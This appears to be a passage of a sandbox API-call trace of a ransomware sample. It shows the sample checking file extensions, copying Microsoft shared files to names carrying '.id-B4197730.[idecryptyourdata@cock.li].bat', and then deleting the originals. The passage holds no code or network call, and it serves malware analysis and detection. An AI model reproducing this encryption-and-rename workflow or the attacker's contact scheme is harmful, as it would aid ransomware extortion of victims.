lstrlenW (lpString=".xls") returned 4 [0183.000] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0183.000] lstrlenW (lpString=".xlsx") returned 5 [0183.000] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0183.000] lstrlenW (lpString=".ppt") returned 4 [0183.000] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0183.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.000] lstrlenW (lpString=".zip") returned 4 [0183.000] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0183.000] lstrlenW (lpString=".rar") returned 4 [0183.000] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0183.000] lstrlenW (lpString=".bz2") returned 4 [0183.000] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0183.000] lstrlenW (lpString=".7z") returned 3 [0183.000] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0183.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.000] lstrlenW (lpString=".dbf") returned 4 [0183.000] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0183.000] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.000] lstrlenW (lpString=".1cd") returned 4 [0183.000] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0183.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.001] lstrlenW (lpString=".jpg") returned 4 [0183.001] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0183.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.001] lstrlenW (lpString=".doc") returned 4 [0183.001] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0183.001] lstrlenW (lpString=".docx") returned 5 [0183.001] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0183.001] lstrlenW (lpString=".pdf") returned 4 [0183.001] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0183.001] lstrlenW (lpString=".xls") returned 4 [0183.001] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0183.001] lstrlenW (lpString=".xlsx") returned 5 [0183.001] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0183.001] lstrlenW (lpString=".ppt") returned 4 [0183.001] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0183.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.001] lstrlenW (lpString=".zip") returned 4 [0183.001] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0183.001] lstrlenW (lpString=".rar") returned 4 [0183.001] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0183.001] lstrlenW (lpString=".bz2") returned 4 [0183.001] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0183.001] lstrlenW (lpString=".7z") returned 3 [0183.001] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0183.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.001] lstrlenW (lpString=".dbf") returned 4 [0183.002] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0183.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.002] lstrlenW (lpString=".1cd") returned 4 [0183.002] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0183.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe") returned 58 [0183.002] lstrlenW (lpString=".jpg") returned 4 [0183.002] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0183.002] lstrcmpiW (lpString1=".xrm-ms", lpString2=".bat") returned 1 [0183.002] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0183.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0183.003] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=590523) returned 1 [0183.003] CloseHandle (hObject=0x394) returned 1 [0183.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 0x20 [0183.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0183.003] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.003] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0183.004] GetLastError () returned 0x0 [0183.004] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x902bb, lpOverlapped=0x0) returned 1 [0183.861] WriteFile (in: hFile=0x398, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x902c0, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x902c0, lpOverlapped=0x0) returned 1 [0183.872] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0183.872] WriteFile (in: hFile=0x398, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x104, lpOverlapped=0x0) returned 1 [0183.873] SetEndOfFile (hFile=0x398) returned 1 [0183.873] CloseHandle (hObject=0x398) returned 1 [0183.873] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.873] SetEndOfFile (hFile=0x394) returned 1 [0183.879] CloseHandle (hObject=0x394) returned 1 [0183.879] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0183.879] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms")) returned 1 [0183.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.879] lstrlenW (lpString=".doc") returned 4 [0183.879] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0183.879] lstrlenW (lpString=".docx") returned 5 [0183.879] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0183.880] lstrlenW (lpString=".pdf") returned 4 [0183.880] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString=".xls") returned 4 [0183.880] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString=".xlsx") returned 5 [0183.880] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0183.880] lstrlenW (lpString=".ppt") returned 4 [0183.880] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.880] lstrlenW (lpString=".zip") returned 4 [0183.880] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString=".rar") returned 4 [0183.880] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString=".bz2") returned 4 [0183.880] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString=".7z") returned 3 [0183.880] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0183.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.880] lstrlenW (lpString=".dbf") returned 4 [0183.880] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.880] lstrlenW (lpString=".1cd") returned 4 [0183.880] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.880] lstrlenW (lpString=".jpg") returned 4 [0183.880] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0183.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.881] lstrlenW (lpString=".doc") returned 4 [0183.881] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString=".docx") returned 5 [0183.881] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0183.881] lstrlenW (lpString=".pdf") returned 4 [0183.881] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString=".xls") returned 4 [0183.881] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString=".xlsx") returned 5 [0183.881] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0183.881] lstrlenW (lpString=".ppt") returned 4 [0183.881] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.881] lstrlenW (lpString=".zip") returned 4 [0183.881] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString=".rar") returned 4 [0183.881] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString=".bz2") returned 4 [0183.881] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString=".7z") returned 3 [0183.881] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0183.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.881] lstrlenW (lpString=".dbf") returned 4 [0183.881] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.881] lstrlenW (lpString=".1cd") returned 4 [0183.881] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0183.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 104 [0183.881] lstrlenW (lpString=".jpg") returned 4 [0183.882] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0183.882] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0183.882] lstrlenW (lpString="msdia90.dll") returned 11 [0183.882] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0183.882] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=855376) returned 1 [0183.882] CloseHandle (hObject=0x394) returned 1 [0183.882] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll")) returned 0x20 [0183.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0183.883] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.883] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0183.883] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0183.985] GetLastError () returned 0x0 [0183.985] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0xd0d50, lpOverlapped=0x0) returned 1 [0184.241] WriteFile (in: hFile=0x388, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xd0d60, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xd0d60, lpOverlapped=0x0) returned 1 [0184.547] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.547] WriteFile (in: hFile=0x388, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xea, lpOverlapped=0x0) returned 1 [0184.548] SetEndOfFile (hFile=0x388) returned 1 [0184.548] CloseHandle (hObject=0x388) returned 1 [0184.548] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.548] SetEndOfFile (hFile=0x394) returned 1 [0184.556] CloseHandle (hObject=0x394) returned 1 [0184.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.556] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll")) returned 1 [0184.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.557] lstrlenW (lpString=".doc") returned 4 [0184.557] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.557] lstrlenW (lpString=".docx") returned 5 [0184.557] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0184.557] lstrlenW (lpString=".pdf") returned 4 [0184.557] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.557] lstrlenW (lpString=".xls") returned 4 [0184.557] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.557] lstrlenW (lpString=".xlsx") returned 5 [0184.557] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0184.557] lstrlenW (lpString=".ppt") returned 4 [0184.557] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.557] lstrlenW (lpString=".zip") returned 4 [0184.557] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.557] lstrlenW (lpString=".rar") returned 4 [0184.557] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.557] lstrlenW (lpString=".bz2") returned 4 [0184.557] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.557] lstrlenW (lpString=".7z") returned 3 [0184.557] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.557] lstrlenW (lpString=".dbf") returned 4 [0184.557] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.557] lstrlenW (lpString=".1cd") returned 4 [0184.557] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.558] lstrlenW (lpString=".jpg") returned 4 [0184.558] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.558] lstrlenW (lpString=".doc") returned 4 [0184.558] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString=".docx") returned 5 [0184.558] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0184.558] lstrlenW (lpString=".pdf") returned 4 [0184.558] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString=".xls") returned 4 [0184.558] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString=".xlsx") returned 5 [0184.558] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0184.558] lstrlenW (lpString=".ppt") returned 4 [0184.558] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.558] lstrlenW (lpString=".zip") returned 4 [0184.558] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString=".rar") returned 4 [0184.558] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.558] lstrlenW (lpString=".bz2") returned 4 [0184.558] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.558] lstrlenW (lpString=".7z") returned 3 [0184.558] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.558] lstrlenW (lpString=".dbf") returned 4 [0184.558] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.559] lstrlenW (lpString=".1cd") returned 4 [0184.559] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.559] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll") returned 61 [0184.559] lstrlenW (lpString=".jpg") returned 4 [0184.559] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.559] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.559] lstrlenW (lpString="vstoee.dll") returned 10 [0184.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0184.559] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x34dff14 | out: lpFileSize=0x34dff14*=168064) returned 1 [0184.560] CloseHandle (hObject=0x394) returned 1 [0184.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll")) returned 0x20 [0184.560] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0184.560] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.560] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0184.640] GetLastError () returned 0x0 [0184.640] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x29080, lpOverlapped=0x0) returned 1 [0184.723] WriteFile (in: hFile=0x3a8, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0x29090, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0x29090, lpOverlapped=0x0) returned 1 [0184.727] ReadFile (in: hFile=0x394, lpBuffer=0x3f3a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesRead=0x34dfecc*=0x0, lpOverlapped=0x0) returned 1 [0184.727] WriteFile (in: hFile=0x3a8, lpBuffer=0x3f3a020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x34dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3f3a020*, lpNumberOfBytesWritten=0x34dfc94*=0xe8, lpOverlapped=0x0) returned 1 [0184.727] SetEndOfFile (hFile=0x3a8) returned 1 [0184.727] CloseHandle (hObject=0x3a8) returned 1 [0184.727] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34dfec0 | out: lpNewFilePointer=0x0) returned 1 [0184.727] SetEndOfFile (hFile=0x394) returned 1 [0184.729] CloseHandle (hObject=0x394) returned 1 [0184.729] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0184.730] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll")) returned 1 [0184.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.730] lstrlenW (lpString=".doc") returned 4 [0184.730] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.730] lstrlenW (lpString=".docx") returned 5 [0184.730] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0184.730] lstrlenW (lpString=".pdf") returned 4 [0184.730] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.730] lstrlenW (lpString=".xls") returned 4 [0184.730] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.730] lstrlenW (lpString=".xlsx") returned 5 [0184.730] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0184.730] lstrlenW (lpString=".ppt") returned 4 [0184.730] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 62 [0184.730] lstrlenW (lpString=".zip") returned 4 [0184.730] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.730] lstrlenW (lpString=".rar") returned 4 [0184.730] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.730] lstrlenW (lpString=".bz2") returned 4 [0184.731] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.731] lstrlenW (lpString=".7z") returned 3 [0184.731] lstrcmpiW 